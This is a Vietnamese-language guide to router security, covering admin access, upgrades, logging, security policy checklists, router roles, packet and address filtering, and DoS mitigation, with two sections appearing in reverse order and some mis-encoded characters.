| |
|
|
Quản lý router
3.3 Quản lý router:
3.3.1 Cơ chế truy cập của Admin:
Điều khiển truy cập đến router dưới quyền admin là một vấn đề quan trọng. Có 2 loại truy cập: cục bộ và từ xa. Truy cập cục bộ là dùng một dump terminal hay laptop kết nối trực tiếp đến cổng console trên router. Truy cập từ xa là dùng một máy tính (trên cùng subnet hay khác subnet) để telnet hay SNMP đến router.Khuyến cáo: Chỉ nên cho truy cập cục bộ vì khi telnet hay SNMP thì password được gởi đến router dưới dạng plain (không được mã hoá)-->Nếu một hacker sniff dòng dữ liệu này thì anh ta cũng sẽ tóm được password của bạn. Tuy nhiên, nếu thực sự cần thiết phải có remote access thì có thể áp dụng các phương pháp sau:
1.Thiết lập một mạng quản lý chuyên dụng. Mạng này chỉ nên có các adminitrator host và các spare interface của mỗi router. Hình vẽ minh hoạ như sau (Hinh 3.6):
2.Mã hoá tất cả thông tin được truyền giữa administrator host và router. (Phần 5.2 là một ví dụ về mã hoá IPSec với Cisco router và Windows 2000, phần 5.3 chỉ cho ta biết cách thiết lập một Cisco router để nó hỗ trợ mã hoá SSH).
Trong cả hai biện pháp trên đây, ta cũng nên thiết lập việc lọc gói, chỉ cho phép những administrator host được định trước có quyền truy cập đến router.
Ngoài cách truy cập vào router, ta cũng cần phải phân quyền cho admin. Tức là có nhiều mức admin và có nhiều vai trò quản lý khác nhau. Ví dụ, “network manager” (quản lý mạng) sẽ có quyền xem xét, chỉnh sửa các thông sổ interface và cấu hình router; “operator” (điều hành mạng) sẽ chỉ có quyền xoá kết nối và bộ đếm. Nhìn chung, ta nên giới hạn số admin toàn quyền đến mức thấp nhất.
3.3.2 Nâng cấp router
Ta cần phải nâng cấp (update) hệ điều hành và file cấu hình của router định kỳ. Lý do: chữa những lỗi bảo mật, tăng hiệu suất hay hỗ trợ các tính năng mới (có thể là những tính năng này cho phép tăng cường chính sách bảo mật).
Trước khi update, admin cần thực hiện các bước như sau:
-Xác định lượng bộ nhớ cần thiết để update, nếu cần thì thêm bộ nhớ.
-Thiết lập và thử khả năng truyền file giữa host cúa admin và router.
-Lập lịch lúc mạng và router không hoạt động để tiến hành update (thường là sau giờ làm việc hành chính).
Sau khi nhận được bản update từ nhà phân phối và kiểm tra, admin cần thực hiện các bước sau:
-Shutdown hay disconnect các interface trên router
-Sao lưu OS và file cấu hình hiện hành vào máy tính của admin.
-Tải bản update lên router.
-Kiểm tra lại để khẳng định việc update tốt đẹp hay không. Nếu tốt thì reconnect các interface trên router, ngược lại thì lấy lại cái cũ (vừa backup xong)
3.3.3 Logging
Logging cung cấp cho ta nhiều tiện ích. Khi sử dụng thông tin trong file log, admin có thể biết được router hoạt động bình thường hay không. Trong vài trường hợp, nó có thể cho ta biết loại tấn công nào đang tấn công router hay mạng của chúng ta.
Nên cấu hình logging trên router một cách cẩn thận và gởi file log đến log host (một máy tính chuyên dùng để lưu trữ file log). Log host nên được nối vào một mạng được bảo vệ hay la một interface riêng của router. Tăng cường bảo mật cho log host bằng cách loại bỏ những dịch vụ hoặc account khong cần thiết. Thiết lập mức log tương ứng với chính sách bảo mật, và thay đổi cách thông sổ log khi mạng thay đổi. Mức log được thay đổi dựa vào việc kiểm tra xem bao nhiêu thông tin log la phù hợp và hữu dụng.Có 2 lĩnh vực cần được log là: (1)phạm vào những qui tắc từ chối truy cập, (2)thay đổi cấu hình router.
Vấn đề quan trọng nhất là ta phải xem file log thường xuyên. Bằng cách kiểm tra file log thường xuyên, ta có thể cảm nhận đươc trạng thái hoạt động bình thường của mạng và khi có một sự bất thường nào đó xảy ra thì ta có thể biết được.
Dấu thời gian (timestamp)rất quan trọng trong logging. Tuy rằng router có đồng hồ riêng, nhưng như vậy là không đủ, ta phải hướng router đến ít nhất là 2 time server để đảm bảo tính chính xác của dấu thời gian. Như vậy, ta cần hướng router đến các time server ổ định và kèm theo thời gian trong mỗi message log. Điều này cho phép ta tin tưởng lần theo các cuộc tấn công. Ta cũng cần xem xét đến việc lưu các file log này vào thiết bị lưu trữ chỉ ghi 1 lần hay in ra giấy (phòng khi log host có vấn đề).
3.3.4Quản lý bảo mật trong thời gian hoạt động:
Để đạt được bảo mật trong thời gian hoạt động, cần phải đánh giá, kiểm tra và chỉnh sửa thường xuyên.
Một vấn đề khác là cần phải sẵn sàng cho các sự cố xảy ra: Ta phải backup cấu hình router và IOS hiện hành (ta sẽ dùng backup này để restore lại trạng thái ban đầu khi bị hack hay bị hư hỏng phần cứng nhẹ). Đồng thời, phải lập ra một kế hoạch thực hiện phục hồi, thảo ra các thủ tục, luyện tập kế hoạch định kỳ để tất cả các thành viên hiểu được vai trò của họ. Kế hoạch phục hồi phải phù hợp với chính sách bảo mật của bạn.
Trong trường hợp bị xâm nhập, cần phải trử các bằng chứng để thực hiện điều tra hoặc truy tố. Nhớ đính kèm các bước để thấy trạng thái router bị xâm nhập trong kế hoạch phục hồi của bạn.
3.4.Chính sách bảo mật cho router:
Router là một phần quan trọng của mạng, và bảo mật của nó là một phần quan trọng trong hệ thống bảo mật toàn mạng mà router phục vụ. Nhưng router được bảo mật là như thế nào? Một cách đơn giản để định nghĩa bảo mật cho router là: quản lý, cấu hình, hoạt động của router có thoả mãn được chính sách bảo mật của bạn hay không.
3.4.1Cơ bản về chính sách bảo mật của router:
Hình 3.7 dưới đây sẽ cho ta thấy cấu trúc lớp về bảo mật của router. Bảo mật của một lớp phụ thuộc vào bảo mật của lớp bên trong nó.
Lớp trong cùng là lớp bảo mật về vật lý của router. Một hacker có khả năng truy xuất vật lý router sẽ có thể làm nguy hại đến router, do đó, ta phải quản lý tốt việc truy cập về mặt vật lý nhằm tạo ra một nền tảng vững chắc cho bảo mật của toàn bộ hệ thống. Hầu hết router cung cấp một hoặc nhiều kết nối trực tiếp thông qua port Console hay Control, những port này tạo ra một cơ chế đặc biệt để điều khiển router. Do đó ta phải thiết lập các qui tắc (rule) để kiểm soát những port này được dùng ở đâu và như thế nào.
Lớp kế tiếp là lớp lưu trữ cấu hình tĩnh và phần mềm của router. Nếu hacker có thể xâm nhập vào phần này (đặc biệt là phần cấu hình tĩnh) thì anh ta cũng có thể điều khiển được hai lớp còn lại bên ngoài. Vài thông số quan trọng của cấu hình tĩnh là địa chỉ giao tiếp (interface address), username, password, và những điều khiển truy cập để truy xuất trực tiếp đến command interface (phần nhận lệnh của người sdụng) của router. Do đó ta cần thiết lập rule thật chặt cho lớp này ở cả cơ chế hoạt động của mạng lẫn vai trò của admin.
Lớp tiếp theo là lớp cấu hình động của router, gồm: route table, interface status, ARP table, audit log,...Nếu hacker có thể xâm nhập vào lớp này thì anh ta cũng có thể xâm nhập được vào lớp ngoài cùng. Do đó nên thiết lập rule cho lớp này, tuy nhiên đôi khi nó bị bỏ qua.
Lớp ngoài cùng biểu diễn lượng thông tin (của mạng cục bộ lẫn bên ngoài) mà router quản lý.Chính sách bảo mật mạng có thể qui định rule cho lớp này: xác định những giao thức và dịch vụ nào được cho phép, xác định cơ chế truy cập và vai trò quản lý. Những yêu cầu quan trọng của chính sách quản lý mạng phải được phản ánh thông qua cấu hình router và chính sách bảo mật của router.
3.4.2Chính sách bảo mật router và chính sách bảo mật toàn bộ hệ thống:
Thông thường, mạng mà router phục vụ sẽ có một chính sách bảo mật, định nghĩa vai trò (role), quyền, rule và trách nhiệm.Chính sách bảo mật của router phải phù hợp với chính sách của toàn mạng. Vại trò được định nghĩa trong chính sách bảo mật của router phải là một tập con của chính sách bảo mật của toàn mạng. Rule để quản trị router nên rõ ràng đối với ứng dụng của network rule.
Ví dụ: Một chính sách bảo mật mạng định nghĩa 3 vai trò: admin, perator, user. Chính sách bảo mật router có thể chỉ có 2: admin và operator. Mỗi một vai trò phải được gán đặc quyền trong chính sách bảo mật của router để nó có thể hoàn thành được trách nhiệm được nên rõ trong chính sách bảo mật của mạng. Ví dụ, operator sẽ được cấp quyền login vào router để xem router log-->anh ta sẽ hoàn thành được trách nhiệm xem định kỳ audit log mà chính sách bảo mật mạng đã giao phó cho anh ta.
Mặt khác, chính sách bảo mật router phải chi tiết hơn chính sách bảo mật mạng. Trong vài trường hợp, router ảnh hưởng đến chính sách bảo mật của mạng và chính sách bảo mật của router phải phản ánh rõ điều này.
Ví dụ, chính sách bảo mật mạng yêu cầu chỉ được quản lý router từ mạng LAN thì chính sách bảo mật của router phải thiết lập những rule thích hợp để cấm quản lý router từ xa.
3.4.3Tạo một chính sách bảo mật cho router:
Có nhiều lời khuyên khi tạo chính sách bảo mật cho router:
-Xác định những mục đích bảo mật chứ khong phải xác định lệnh hay cơ chế cụ thể --> chính sách sẽ trở nên khả chuyển giữa các version phần mềm router khác nhau hay giữa các loại router khác nhau.
-Xác định chính sách cho tất cả các lớp, bắt đầu từ lớp vật lý đi ra ngoài.
-Những giao thức và dịch vụ không được cho phép một cách rõ ràng thì nên cấm chúng. Khi dùng chính sách bảo mật của router phản ánh chính sách bảo mật của mạng, cần tìm những giao thức và dịch vụ cần thiết cho hoạt đọng của mạng, cho phép chúng một cách tường minh và cấm hoàn toàn những cái còn lại.
Trong vài trường hợp, ta không thể làm được như trên. Ví dụ, backbone router (phải định tuyến cho nhiều mạng con khác nhau) không thể làm như trên được vì vấn đề hiệu suất và sự khác nhau trong các chính sách bảo mật của các mạng con. Trong những trường hợp như vậy, cần định rõ những giới hạn hay hạn chế bị ảnh hưởng. Khi phác thảo một chính sách, cần mô tả mục đích chứ khong môt tả cơ chế một cách rõ ràng.
Một chính sách bảo mật phải là một tài liêu sống. Phải thường xuyên xem xét lại các chính sách bảo mật (của router và của toàn mạng). Cập nhật lại chính sách bảo mật của router khi chính sách bảo mật của mạng thay đổi hay khi mục đích bảo mật của router thay đổi.Cần xem xét lại chính sách bảo mật router khi kiến trúc mạng thay đổi hay cấu trúc quản lý mạng thay đổi. Đặc biệt, xem lại chính sách bảo mật trong các trường hợp sau:
-Có kết nối mới giữa mạng cục bộ và mạng bên ngoài.
-Thay đổi lớn về cơ cấu, thủ tục, hoạt động quản lý.
-Thay đổi lớn về chính sách bảo mật toàn mạng.
-Cài đặt các khả năng mới (ví dụ như VPN mới) hay thiết bị mạng mới (vd như firewall mới)
-Phát hiện một cuộc tấn công hay bị xâm nhập.
Khi xem xét chính sách bảo mật của router, cần báo cho tất cả những người quản trị router và tất cả những người có quyền truy cập vật lý đến nó.Giữ những hiểu biết về chính sách rất quan trọng trong việc tương thích giữa các chính sách.
Cuối cùng, có vài tổ chức áp đặt một số các chính sách bảo mật trên các mạng con, do đó, cần phải kiểm tra kỹ xem các chính sách bảo mật của bạn có phù hợp với chính sách bảo mật ở cấp cao hơn hay không, nếu không phải sửa lại cho phù hợp.
3.4.4Những yêu cầu khi kiểm tra chính sách bảo mật của router:
Những yêu cầu này được thiết lập để trợ giúp bạn tạo ra được một chính sách bảo mật router tốt. Sau khi phác thảo chính sách, lần lượt kiểm tra từng mục một trong danh sách sau.
Bảo mật về mặt vật lý:
-Xác định ai có quyền cài đặt, di chuyển hay bỏ router.
-Xác định ai có quyền bảo trì phần cứng và thay đổi cấu hình vật lý của router.
-Xác định ai có quyền thiết lập kết nối vật lý đến router.
-Chỉ ra điều khiển về nơi đặt và sự sử dụng console hay các kết nối cổng trực tiếp khác.
-Chỉ ra những thủ tục phục hồi khi phần cứng bị hư hay khi có dấu hiệu router bị phá hoại.
Bảo mật cấu hình tĩnh:
-Xác định ai có quyền kết nối trực tiếp vào router thông qua console hay kết nối cổng trực tiếp khác.
-Xác định ai có quyền admin trên router.
-Xác định thủ tục và bài thực hành để thay đổi cấu hình tĩnh của router.
-Xác định chính sách về password cho user password và admin password, bao gồm cả những điều kiện để yêu cầu phải đổi password (vd, lúc bị xâm nhập, lúc thay đổi admin, lúc hết thời gian tồn tại password)
-Xác định ai có quyền truy cập router từ xa.
-Xác định những giao thức, thủ tục để truy cập router từ xa.
-Xác định thủ tục phục hồi, và ai có trách nhiêm phuc hồi khi có sự cố.
-Xác định chính sách log, chỉ ra thủ tục quản lý log và trách nhiệm xem log.
-Xác định những thủ tuc và đưa ra những giới hạn trong việc sử dụng các công cụ theo dõi và quản lý tự động (vd, SNMP)
-Vạch ra cách đáp ứng hay hướng dẫn phát hiện router bị xâm nhập.
-Định ra các chính sách quản lý và khoảng thời gian cập nhật longterm secrect cho routing protocol, NTP, TACAS+, RADIUS, SNMP,...
-Định ra chính sách quản lý chính cho chìa khoá mã hoá dài hạn (nếu có)
Bảo mật cấu hình động:
-Xác định các dịch vụ cấu hình động được chạy trên router và những mạng được truy cập đến những dịch vụ này.
-Xác định các routing protocol cần được sử dụng và những vấn đề bảo mật cần được thiết lập trên mối protocol.
-Xác định cơ chế và chính sách để thiết lập đồng hồ của router (bằng tay hay dùng NTP)
-Xác định thuật toán mã hoá và key tương ứng để dùng trong các phiên kết nối VPN với các mạng khác.
Bảo mật dịch vụ mạng:
-Liệt kê các giao thức, cổng, dịch vụ được router cho phép ở mỗi interface hay kết nối (vd, inbound hay outbound) và đưa ra những thủ tục để xác nhận quyền.
-Mô tả thủ tục và vai trò bảo mật khi tương tác với nhà cung cấp dịch vụ hay nhân viên bảo hành ben ngoài.
Đáp ứng khi bị xâm hại:
-Liệt kê các nhân hay tổ chức sẽ được thông báo khi có xâm hại.
-Định ra những thông tin cấu hình cần thiết phải giữ lại.
-Định ra những thủ tuc đáp ứng, kiểm tra quyền, và mục đích của đáp ứng sau khi mạng bị xâm nhập, bao gồm cả việctìm hiểu để lưu bằng chứng và để thực thi luật pháp.
|
 |
|
|
Router Security Principles and Goals
3. Các mục đích vŕ nguyên tắc của sự bảo mật router
Các router đóng một vai trň quan trọng trong việc bảo mật mạng. Phần này trình bày những nguyên tắc cơ bản cho một router tự bảo vệ nó, bảo vệ một mạng với một router, và sử dụng một router được an toàn.
3.1 Router tự bảo vệ
3.1.1 Bảo mật về mặt vật lý
Có một số cách để bảo mật một router về mặt vật lý. Phňng chứa router phải không bị nhiễu từ hoặc nhiễu tĩnh điện. Phňng phải có các bộ kiểm soát độ ẩm vŕ nhiệt độ. Nếu thấy cần thiết vì những lý do nhạy cảm hoặc cần dùng ngay, một bộ UPS phải được lắp đặt, các thŕnh phần dự phòng cùng các thứ đi kèm phải sẵn sàng để thay thế. Để giúp cho việc bŕo vệ chống lại một vài kiểu tấn công từ chối dịch vụ, và cho phép hỗ trợ rộng rãi các loại dịch vụ bảo mật nhất, router phải được cấu hěnh với dung lượng bộ nhớ lớn nhất có thể*. Đồng thời, router phải được đặt trong một phňng khóa chặt, chỉ một số ít người được phép mới vŕo. Cuối cùng, các thiết bị vật lý ( chẳng hạn như các PC card, modem) thường kết nối tới router đòi hỏi phải có sự bảo vệ về mặt lưu trữ.
3.1.2 Hệ điều hŕnh
Hệ điều hŕnh cho router là một thành phần cốt yếu. Quyết địnhxem mạng cần có những đặc điểm nŕo, và dùng danh sách các đặc điểm để chọn phięn bản của hệ điều hŕnh. Tuy nhiên, không phải phiên bản mới nhất của bất kỳ hệ điều hŕnh nào cũng đều là đáng tin cậy nhất do sự phơi bày còn hạn chế của nó trong một diện rộng các môi trường mạng. Người quản trị mạng phải dùng phiên bản ổn định cuối cùng của hệ điều hành mà phù hợp với các yêu cầu về mặt đạc điểm.
3.1.3 Làm vững chãi cấu hình
Một router cũng giống như nhiều máy tính, có nhiều dịch vụ chạy theo chế độ mặc định. Nhiều trong số những dịch vụ nŕy là không cần thiết và có thể được một hacker dùng để khai thác hay thu thập thông tin. Tất cả các dịch vụ không cần thiết phải được tắt đi trong cấu hěnh của router. Phần 3.3.2 thảo luận việc quản lý các cập nhật cho cấu hình của router.
* Một số người đọc có thể bỏ qua lời khuyęn này; họ có thể nghĩ rằng bộ nhớ tốn tiền và vì thế nên mua một router với dung lượng bộ nhớ tối thiểu cần thiết để hỗ trợ cho công việc của nó. Điều nŕy một sự tiết kiệm sai lầm. Chi phí tăng lęn do bộ nhớ thêm thường nhỏ hơn tổng chi phí cho một router được cấu hình đầy đủ, vŕ tính linh động vŕ hiệu suất do bộ nhớ thêm mang lại hầu như luôn đáng giá khi důng dần cho số dịch vụ và người dùng dựa vào router cho hoạt động kết nối. Đồng thời, bổ sung bộ nhớ cho một router đang hoạt động đňi hỏi phải tạm dừng các dịch vụ do nó cung cấp. Ví dụ, trong cộng đồng các ISP (Internet Service Provider), một ngành kinh doanh được xem như thực hiện tốt nhất việc trang bị cho tất cả các router đang hoạt động dung lượng bộ nhớ lớn nhất mŕ nó hỗ trợ.
3.2 Bảo vệ mạng với router
3.2.1 Các vai trò trong bảo mật và các thao tác mạng
Các router thực hiện nhiều công việc khác nhau trong các mạng hiện nay, nhưng trong cuộc thảo luận này, chúng ta sẽ xem xét ba phương hướng cơ bản mà các router được dùng.
Các interior router
Một interior router chuyển tiếp các gói tin giữa hai hay nhiều mạng cục bộ trong vòng một tổ chức hay xí nghiệp. Các mạng nối nhau bởi một interior router thường chia sẻ chính sách bảo mật giống nhau và độ tin cậy giữa chúng thường ở mức cao. Nếu một xí nghiệp có nhiều interior router, chúng thường sử dụng một Interior Gateway Protocol (tạm dịch là giao thức cầu nối nội) để điều khiển các router. Các interior router có thể bắt các gói tin mà chúng chuyển tiếp giữa các mạng chịu một số giới hạn.
Hầu hết sự hướng dẫn trong sách này đều hữu dụng cho các interior router.
Hình 3-1: Một interior router kết nối tới các mạng nội bộ của một xí nghiệp
Các backbone router
Một backbone hay một exterior router là một router chuyển tiếp các gói tin giữa các xí nghiệp khác nhau( còn được gọi là các ‘autonomous system’ khác nhau). Giao thông giữa các mạng khác nhau hình thành nên mạng Internet, được điều khiển bởi các backbone router.
Độ tin cậy giữa các mạng kết nối bởi một backbone router thường rất thấp. Thông thường, các backbone router được thiết kế vŕ cấu hình để chuyển tiếp các gói tin càng nhanh càng tốt, mà không buộc các gói tin phải chịu bất kỳ giới hạn nào. Những mục đích bảo mật chính cho một backbone router là phải đảm bảo rằng sự hoạt động vŕ sự điều khiển của router chỉ được quản lý bởi những nhóm người có thẩm quyền, vŕ phải bảo vệ tính toàn vẹn của thông tin gửi qua mà nó dùng để chuyển tiếp các gói tin. Các backbone router thường dùng các Exterior Gateway Protocol(tạm dịch là các giao thức cầu nối ngoại) để điều khiển các router.
Việc cấu hình cho các backbone router là công việc mang tính chuyên môn cao. Hầu hết các kỹ thuật mô tả trong sách này có thể áp dụng cho các backbone router, nhưng có thể cần phải thay đổi hoặc hiệu chỉnh lại cho phù hợp với các ứng dụng cụ thể.
Hình 3-2: Các backbone router kết nối nhiều mạng với nhau
Các border router
Một boder router chuyển tiếp các gói tin giữa một xí nghiệp và các mạng bên ngoài. Đặc điểm chính của một border router lŕ nó tạo nên đường biên giữa các mạng nội bộ được tin cậy của một xí nghiệp và các mạng bên ngoài không được tin cậy( như Internet chẳng hạn). Nó có thể giúp bảo mật vòng ngoài của một mạng xí nghiệp bằng các sự giới hạn bắt buộc đối với các gói tin mà nó điều khiển. Một border router có thể dùng các routing protocol( tạm dịch là các giao thức gửi tin) hay nó có thể hoàn toàn dựa vào các static router( các router tĩnh).
Hình 3-3: Một border router kết nối các mạng nội bộ với một mạng ngoài
Thông thường, một border router không phải là thành phần duy nhất ở đường biên; nhiều xí nghiệp còn sử dụng một firewall( bức tường lửa) để áp đặt chính sách bảo mật nghiêm ngặt.
Trong hình 3-4, border router đóng vai trò như một tuyến phòng thủ đầu tiên và được coi là một screening router. Nó chứa một router tĩnh chuyển tất cả các kết nối nhằm vào mạng được bảo vệ đến firewall. Firewall đưa ra sự điều khiển truy nhập bổ sung cho giao thông mạng vŕ các kết nối. Firewall cũng có thể thi hành user authentication. Dùng một firewall và một router cùng lúc có thể đem lại sự bảo mật tốt hơn khi chỉ dùng một trong hai.
Hình 3-4: Cấu hình một router-tường lửa đơn giŕn cho đường bięn một mạng
Phương pháp giải quyết khác là phải bố trí một router ở điểm nối giữa các mạng ngoài, và sau đó là router khác giữa firewall và các mạng nội bộ được tin cậy. Cấu hình này tạo ra hai điểm mà chính sách bảo mật có thể được áp đặt. Nó cũng tạo ra một vůng trung gian thường gọi là khu vực phi quân sự( DMZ) giữa hai router. DMZ thường được dùng cho các server truy cập được từ Internet hay mạng ngoài khác.
Hình 3-5: Cấu hình hai router-firewall cho đường biên một mạng
Tất cả các chỉ dẫn trong sách này đều phù hợp với các border router.
3.2.2 Các bộ lọc gói tin cho TCP/IP
Một bộ lọc gói tin cho các dịch vụ TCP/IP điều khiển việc vận chuyển dữ liệu giữa các mạng dựa vào các giao thức và các địa chỉ. Các router có thể dùng các bộ lọc theo những cách khác nhau. Một vài router có các bộ lọc tác động vào các dịch vụ mạng theo cả chiều đi vào và đi ra, trong khi số khác có các bộ lọc chỉ tác động theo một chiều.( Nhiều dịch vụ mang tính hai chiều. Ví dụ, một người důng ở hệ thống A telnet tới hệ thống B, và hệ thống B gửi một vài kiểu trả lời lại cho hệ thống A. Vì vậy, một số router cần có hai bộ lọc để xử lý các dịch vụ hai chiều này.) Hầu hết các router có thể lọc một hoặc nhiều thông tin sau: địa chỉ IP nguồn, cổng nguồn, địa chỉ IP đích, cổng đích vŕ kiểu giao thức. Một vài router còn có thể lọc bất kỳ bit nào hay bất kỳ mẫu hình bit nào trong IP header. Tuy nhiên, các router thường không có khả năng lọc nội dung của các dịch vụ( như tên tập tin FTP chẳng hạn).
Các bộ lọc gói tin đặc biệt quan trọng đối với các router khi chúng giữ vai trň một gateway giữa các mạng được tin cậy vŕ không được tin cậy. Trong vai trň đó, router có thể áp đặt chính sách bảo mật, loại bỏ các giao thức vŕ từ chối các cổng dựa theo các chính sách của mạng được tin cậy. Các bộ lọc cũng quan trọng bởi khả năng áp đặt sự rŕng buộc địa chỉ. Ví dụ, trong hěnh 3-1, router phải áp đặt sự rŕng buộc là các gói tin gửi từ firewall hay mạng được bảo vệ (từ phải sang trái) phải mang một địa chỉ nguồn trong khoảng riêng biệt. Thỉnh thoảng nó còn được gọi là "việc lọc đường ra”. Tương tự, router phải áp đặt sự rŕng buộc là các gói tin đến từ Internet phải mang một địa chỉ nguồn bęn ngoài khoảng là hợp lệ đối với mạng được bảo vệ. Nó được gọi lŕ “việc lọc đường vŕo".
Hai đặc điểm chính của các bộ lọc gói tin TCP/IP lŕ việc sắp xếp và độ dài. Một bộ lọc có một hoặc nhiều quy tắc, mỗi quy tắc hoặc chấp nhận hoặc ngăn cấm một tập hợp gói tin nào đó. Số quy tắc trong một gói tin quy định độ dŕi của nó. Nói chung, khi độ dŕi tăng lęn thì bộ lọc càng phức tạp và càng khó để gỡ rối. Trật tự các quy tắc trong một bộ lọc gói tin là xác định(tới hạn). Khi router phân tích một gói tin dựa vào bộ lọc, gói tin sẽ được so sánh với từng quy tắc lọc tin theo tuần tự. Nếu có sự trùng hợp thì gói tin hoặc được cho phép hoặc bị ngăn cấm vŕ phần còn lại của bộ lọc được bỏ qua. Nếu không có sự trùng hợp gói tin sẽ bị ngăn cấm do quy tắc ngăn cấm tuyệt đối ở cuối bộ lọc. Bạn phải cẩn thận tạo ra các quy tắc lọc tin theo trật tự thích hợp, để tất cả các gói tin được đối xử phů hợp với chính sách bảo mật định důng. Một phương pháp sắp xếp là đặt các quy tắc xử lý thông tin trong các gói tin đó cŕng gần vị trí đầu bộ lọc cŕng tốt. Vì vậy, độ dài và việc sắp xếp của bộ quy tắc lọc gói tin có thể ảnh hưởng đến hiệu suất của router. (Ghi chú: sự thảo luận nŕy có thể áp dụng cho các bộ lọc gói tin của các router của Cisco, hầu hết các loại router khác và hầu hết các firewall lọc gói tin khác. Việc lọc tin trong Cisco được thảo luận được thảo luận chi tiết trong Section 4.3. Nếu bạn có một router không do Cisco chế tạo, tham khảo tài liệu hướng dẫn của nó để biết thêm chi tiết.)
Dùng các bộ lọc gói tin: chỉ cho phép các dịch vụ và các giao thức theo quy định
Xem xét cẩn thận dịch vụ mạng nào sẽ được phép đi qua router(đi vŕo và đi ra) và được phép đi đến router. Nếu có thể, hăy dùng nguyên tắc sau để tạo ra các bộ lọc: các dịch vụ nào không được cho phép một cách rõ ràng đều phải bị cấm. Nguyên tắc này đặt biệt quan trọng đối với các border router. Lập danh sách các dịch vụ và các giao thức phải đi qua router, các dịch vụ và các giao thức mà router cần đến cho chính hoạt động của nó. Tạo ra một tập các quy tắc lọc tin cho phép hoạt động giao thông nằm trong danh sách vŕ cấm tất cả các hoạt động giao thông khác.
Trong trường hợp các mạng hay các host nào đó cần truy xuất các dịch vụ đặt biệt, thęm vào một quy tắc lọc tin cho phép dịch vụ đó nhưng chỉ cho các địa chỉ host cụ thể hay các vůng địa chỉ cụ thể. Ví dụ, firewall host mạng có thể lŕ địa chỉ duy nhất được phép kích hoạt các kết nối web (TCP cổng 80) thông qua router.
Dùng các bộ lọc gói tin: từ chối các dịch vụ và các giao thức mạo hiểm
Thỉnh thoảng, ta không thể tuân theo nguyên tắc bảo mật cứng nhắc đã thảo luận ở trên. Trong trường hợp đó, quay lại với các dịch vụ bị cấm do thường là không cần thiết hoặc được xem như các phương tiện truyền bá sự thoả hiệp bảo mật hay dùng. Hai bảng sau liệt kê các dịch vụ phổ biến cần hạn chế bởi vì chúng thu thập thông tin của mạng được bảo vệ hay chúng có các yếu điểm có thể bị khai thác để chống lại mạng được bảo vệ. Bảng đầu tięn liệt kê những dịch vụ nào phải hoàn toàn bị khóa bởi các router thông thường. Trừ khi bạn có một nhu cầu thao tác rõ ràng cần hỗ trợ chúng, các giao thức trong bảng 3-1 phải không được phép đi qua router theo cả hai chiều.
Bảng 3-1: Các dịch vụ bị khoá hoàn toàn ở router
Bảng 3-2 liệt kê một vài dịch vụ trong mạng nội bộ hay trong chính router phải không truy xuất được đối với các kết nối từ các mạng bęn ngoài.
Bảng 3-2: Một vài dịch vụ bị khoá ở router từ các client bên ngoài
Các giao thức và các cổng chuẩn
Một số tổ chức đưa ra một danh sách các giao thức vŕ các cổng chuẩn phải được cho phép hoặc hỗ trợ trong các mạng của họ. Các tổ chức rięng biệt trong US DOD cũng đưa ra các danh sách như vậy, và Defense Information System Agency (DISA) đang cố gắng tìm cách tạo ra một danh sách chuẩn cho cả DOD.
Đối với các mạng lŕ đối tượng của các danh sách nŕy, cách thực hiện tốt nhất trước tiên là chỉ cho phép những giao thức và những cổng nào nằm trong danh sách chuẩn và từ chối tất cả cái khác.
Lọc địa chỉ
Các bộ lọc của router cũng được důng để chống lại việc giả mạo địa chỉ IP, nhất lŕ ở các border router. Trong hầu hết trường hợp, các quy tắc lọc tin phải dùng cả "lọc đường vào" và "lọc đường ra”, bao gồm cả việc khóa các địa chỉ dŕnh riêng. Các nguyên tắc áp dụng cho border router được liệt kê bên dưới.
* Loại bỏ tất cả các gói tin từ các mạng nội bộ mang địa chỉ IP nguồn không thuộc về các mạng nội bộ.( Các gói tin tạo ra bởi các nguồn trong các mạng nội bộ luôn luôn mang địa chỉ nguồn trong một khoảng hay nhiều khoảng được gán cho các mạng nội bộ; bất cứ những gói tin khác nào cố nhận địa chỉ nguồn giả mạo thì hầu như luôn có bản chất không đúng hoặc ác ý.)
* Loại bỏ tất cả các gói tin từ các mạng bên ngoài mang địa chỉ nguồn thuộc về các mạng nội bộ.( giả sử các địa chỉ đă được gán đúng, các gói tin gửi từ các mạng bên ngoải phải luôn mang địa chỉ nguồn nằm trong các khoảng khác với các khoảng đă được ấn định cho các mạng cục bộ. Các gói tin mang địa chỉ giả như vậy thường lŕ thành phần của một cuộc tấn công, và phải được border router vứt bỏ.)
* Loại bỏ tất cả các gói tin với địa chỉ nguồn hay địa chỉ đích thuộc về bất kỳ khoảng địa chỉ nŕo không hợp pháp, không thể tìm đường hoặc được dành riêng.
3.2.3 Giảm đi các cuộc tấn công từ chối dịch vụ
Ngừng dịch vụ hay hiệu suất mạng giảm xuống đáng kể do nhiều nguyęn nhân khác nhau. DoS ám chỉ những cố gắng có chủ ý để gây ra những sự đổ vỡ nghięm trọng. Mặc dầu các cuộc tấn công DoS có thể được xem như những sự quấy rầy có thể chịu đựng được nhưng chúng có thể gây ra các hậu quả nghięm trọng nếu chúng xảy ra ở các thời điểm nhạy cảm. Chưa có giải pháp triệt để nŕo cho vấn đề DoS; khi tŕi nguyên của một mạng còn bị giới hạn và tồn tại công khai thì chúng còn là các điểm yếu để tấn công. Có nhiều mức độ mŕ người quản trị mạng chọn để bảo vệ các mạng khỏi các cuộc tấn công DoS và giảm bớt những tác động của chúng. Những mức độ nŕy đňi hỏi một số nỗ lực hợp tác giữa những người quản trị các host, các thiết bị mạng và nhà cung cấp quyền truy cập. Để có hiệu quả, các mức độ nŕy phải được lęn kế hoạch và áp dụng trước khi cuộc tấn công xảy ra.
Ở mức độ xí nghiệp, có ba chiến lược chính để đối đầu với các cuộc tấn công DoS, được mô tả chi tiết bęn dưới.
Chống lại các gói tin ác ý đến từ mạng công cộng trong mạng xí nghiệp.
Cấu hình và triển khai các mức độ bảo vệ cục bộ ở cả border router cũng như interior router.
Phối hợp các mức độ bảo vệ chống lại các cuộc tấn công DdoS với các nhà cung cấp quyền truy xuất mạng và/hoặc những người quản trị backbone.
